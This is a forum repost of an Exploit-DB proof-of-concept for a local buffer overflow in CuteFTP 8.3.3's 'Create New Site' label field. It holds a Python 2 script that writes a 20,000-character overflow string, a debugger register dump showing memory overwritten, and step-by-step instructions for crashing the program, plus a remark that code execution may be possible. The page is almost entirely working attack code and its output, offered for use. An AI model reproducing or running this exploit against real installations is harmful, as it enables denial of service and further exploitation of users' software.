Exploit CuteFTP 8.3.3 - 'create new site' Local Buffer Overflow (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9817
Проверка EDB
  1. Пройдено
Автор
DR_IDE
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
null
Дата публикации
2009-09-25
Код:
#!/usr/bin/env python

#####################################################################################################
#
# CuteFTP v8.3.3 Home/Pro/Lite Create New Site Local Buffer Overflow PoC
# Found By:	Dr_IDE
# Download: 	http://www.cuteftp.com/downloads/
# Tested On:	Windows 7 RC, XP might be more shell friendly
# Notes: 	This PoC exploits the "Create New Site" mechanism. Any site type that you pick will work.
# 		Because of differences in the internal process of each site type you may be able to get
#		execution through one of these channels.
#
#####################################################################################################

"""
EAX 02120000
ECX 0228BA90 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 41414141
EBX 00004141
ESP 0018C160
EBP 0018C230
ESI 0228BA88
EDI 41414141
EIP 77843913 ntdll.77843913
C 0  ES 002B 32bit 0(FFFFFFFF)
P 0  CS 0023 32bit 0(FFFFFFFF)
A 1  SS 002B 32bit 0(FFFFFFFF)
Z 0  DS 002B 32bit 0(FFFFFFFF)
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0(FFFFFFFF)
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty -??? FFFF 000000FF 00FF00FF
ST1 empty -??? FFFF 00000000 00008200
ST2 empty -??? FFFF 00010000 00010000
ST3 empty 431.99999034404754640
ST4 empty 1.0000000000000000000
ST5 empty 1.0000000000000000000
ST6 empty 16.000000000000000000
ST7 empty 16.000000000000000000
               3 2 1 0      E S P U O Z D I
FST 4020  Cond 1 0 0 0  Err 0 0 1 0 0 0 0 0  (EQ)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

"""

buff = ("\x41" * 20000)

try:
	f1 = open("CuteFTP.txt","w");
	f1.write(buff);
	f1.close();

	print "\nCuteFTP v8.3.2 Home/Pro/Lite Create New Site Local Buffer Overflow PoC"
	print "By: Dr_IDE"
	print "\nFile Created Successfully.\n"
	print "Usage:\n [-] Click File\n [-] Create New FTP Site\n [-] Paste String into Label Field\n [-] Enter anything for Address\n [-] Click Connect\n [-] Boom."
except:
	print "[-] Error. File couldn't be created."
 
Источник
www.exploit-db.com

Похожие темы